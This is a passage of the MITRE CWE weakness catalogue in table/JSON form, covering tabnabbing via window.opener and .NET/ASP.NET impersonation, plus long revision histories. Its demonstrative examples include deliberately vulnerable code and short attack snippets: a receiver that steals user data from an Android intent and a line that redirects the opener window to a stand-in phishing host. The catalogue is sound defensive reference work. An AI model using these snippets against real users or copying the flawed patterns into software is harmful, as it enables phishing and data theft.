"ModificationComment": "updated Causal_Nature, Modes_of_Introduction, References, Relationships",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-03-15",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "269",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "286",
"Nature": "CanAlsoBe",
"Ordinal": null,
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Resultant"
}
] | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tseteuid(0);\n```\n/* do some stuff */* \n\t\n\tseteuid(getuid());",
"IntroText": null,
"Language": "C",
"Nature": "Bad",
"Reference": null
}
],
"ID": "DX-97"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example demonstrates the weakness.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tAccessController.doPrivileged(new PrivilegedAction() {\n\t\t\tpublic Object run() {\n```\n// privileged code goes here, for example:* \n\t\t\t\tSystem.loadLibrary(\"awt\");\n\t\t\t\treturn null;\n\t\t\t\t\n\t\t\t\t *// nothing to return* \n\t\t\t\t}",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
}
],
"ID": "DX-142"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tIntent intent = new Intent();\n\tintent.setAction(\"com.example.BackupUserData\");\n\tintent.setData(file_uri);\n\tintent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);\n\tsendBroadcast(intent);\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tpublic class CallReceiver extends BroadcastReceiver {\n\t\t@Override\n\t\tpublic void onReceive(Context context, Intent intent) {\n\t\t\tUri userData = intent.getData();\n\t\t\tstealUserData(userData);\n\t\t}\n\t}\n```",
"IntroText": null,
"Language": "Java",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user's data.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-108"
}
] | null | null | null | null | 1
|
[
[
"284",
"269",
"266"
]
] |
[
"1022",
"520",
"556",
"9"
] |
1022
|
Use of Web Link to Untrusted Target with window.opener Access
|
Variant
|
Simple
|
Incomplete
|
The web application produces links to untrusted external sites outside of its sphere of control, but it does not properly prevent the external site from modifying security-critical properties of the window.opener object, such as the location property.
|
When a user clicks a link to an external site ("target"), the target="_blank" attribute causes the target site's contents to be opened in a new window or tab, which runs in the same process as the original page. The window.opener object records information about the original page that offered the link. If an attacker can run script on the target page, then they could read or modify certain properties of the window.opener object, including the location property - even if the original and target site are not the same origin. An attacker can modify the location property to automatically redirect the user to a malicious site, e.g. as part of a phishing attack. Since this redirect happens in the original window/tab - which is not necessarily visible, since the browser is focusing the display on the new target page - the user might not notice any suspicious redirection.
|
[
{
"Class": null,
"Name": "JavaScript",
"Prevalence": "Often",
"Type": "Language"
},
{
"Class": "Web Based",
"Name": null,
"Prevalence": "Often",
"Type": "Technology"
}
] |
[
{
"Description": null,
"Term": "tabnabbing"
}
] |
[
{
"Note": "This weakness is introduced during the design of an application when the architect does not specify that a linked external document should not be able to alter the location of the calling page.",
"Phase": "Architecture and Design"
},
{
"Note": "This weakness is introduced during the coding of an application when the developer does not include the noopener and/or noreferrer value for the rel attribute.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Alter Execution Logic"
],
"Likelihood": null,
"Note": "The user may be redirected to an untrusted page that contains undesired content or malicious script code.",
"Scope": [
"Confidentiality"
]
}
] |
[
{
"Description": "Specify in the design that any linked external document must not be granted access to the location object of the calling page.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nWhen creating a link to an external document using the <a> tag with a defined target, for example \"_blank\" or a named frame, provide the rel attribute with a value \"noopener noreferrer\".\n\n\nIf opening the external document in a new window via javascript, then reset the opener by setting it equal to null.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
},
{
"Description": "\n\nDo not use \"_blank\" targets. However, this can affect the usability of the application.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "Library software does not use rel: \"noopener noreferrer\" setting, allowing tabnabbing attacks to redirect to a malicious page",
"Link": "https://www.cve.org/CVERecord?id=CVE-2022-4927",
"Reference": "CVE-2022-4927"
}
] | null | null | null |
[
{
"Authors": [
"Alex Yumashev"
],
"Edition": null,
"ExternalReferenceID": "REF-39",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "05",
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "Target=\"_blank\" - the most underestimated vulnerability ever",
"URL": "https://medium.com/@jitbit/target-blank-the-most-underestimated-vulnerability-ever-96e328301f4c",
"URLDate": null
},
{
"Authors": [
"Ben Halpern"
],
"Edition": null,
"ExternalReferenceID": "REF-40",
"Publication": null,
"PublicationDay": "11",
"PublicationMonth": "09",
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "The target=\"_blank\" vulnerability by example",
"URL": "https://dev.to/ben/the-targetblank-vulnerability-by-example",
"URLDate": null
},
{
"Authors": [
"Mathias Bynens"
],
"Edition": null,
"ExternalReferenceID": "REF-958",
"Publication": null,
"PublicationDay": "15",
"PublicationMonth": "03",
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "About rel=noopener",
"URL": "https://mathiasbynens.github.io/rel-noopener/",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2017-09-26",
"SubmissionName": "David Deatherage",
"SubmissionOrganization": "Silicon Valley Bank",
"SubmissionReleaseDate": "2017-11-08",
"SubmissionVersion": "2.12",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Alternate_Terms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, References",
"ModificationDate": "2018-03-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Detection_Factors, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2018-03-27",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Improper Restriction of Cross-Origin Permission to window.opener.location",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "266",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect \"sources\" (origins of input) with \"sinks\" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)",
"DetectionMethodID": "DM-14",
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Static Analysis"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In this example, the application opens a link in a named window/tab without taking precautions to prevent the called page from tampering with the calling page's location in the browser.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "There are two ways that this weakness is commonly seen. The first is when the application generates an <a> tag is with target=\"_blank\" to point to a target site:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<a href=\"http://attacker-site.example.com/useful-page.html\" target=\"_blank\">\n```",
"IntroText": null,
"Language": "HTML",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "If the attacker offers a useful page on this link (or compromises a trusted, popular site), then a user may click on this link. However, the attacker could use scripting code to modify the window.opener's location property to redirect the application to a malicious, attacker-controlled page - such as one that mimics the look and feel of the original application and convinces the user to re-enter authentication credentials, i.e. phishing:",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\twindow.opener.location = 'http://phishing.example.org/popular-bank-page';\n```",
"IntroText": null,
"Language": "JavaScript",
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "To mitigate this type of weakness, some browsers support the \"rel\" attribute with a value of \"noopener\", which sets the window.opener object equal to null. Another option is to use the \"rel\" attribute with a value of \"noreferrer\", which in essence does the same thing.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<a href=\"http://attacker-site.example.com/useful-page.html\" target=\"_blank\" rel=\"noopener noreferrer\">\n```",
"IntroText": null,
"Language": "HTML",
"Nature": "Good",
"Reference": null
},
{
"BodyText": "A second way that this weakness is commonly seen is when opening a new site directly within JavaScript. In this case, a new site is opened using the window.open() function.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tvar newWindow = window.open(\"http://attacker-site.example.com/useful-page.html\", \"_blank\");\n```",
"IntroText": null,
"Language": "JavaScript",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "To mitigate this, set the window.opener object to null.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tvar newWindow = window.open(\"http://attacker-site.example.com/useful-page.html\", \"_blank\");\n\tnewWindow.opener = null;\n```",
"IntroText": null,
"Language": "JavaScript",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null |
Medium
| null | 1
|
[
[
"284",
"269",
"266",
"1022"
]
] |
[] |
520
|
.NET Misconfiguration: Use of Impersonation
|
Variant
|
Simple
|
Incomplete
|
Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks.
|
.NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user.
| null | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Run the application with limited privilege to the underlying operating and file system.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Operation"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Other_Notes",
"ModificationDate": "2014-06-23",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": ".NET Misconfiguration: Impersonation",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "266",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"269",
"266",
"520"
]
] |
[] |
556
|
ASP.NET Misconfiguration: Use of Identity Impersonation
|
Variant
|
Simple
|
Incomplete
|
Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.
|
The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration.
| null | null |
[
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Use the least privilege principle.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
}
] | null | null | null | null | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
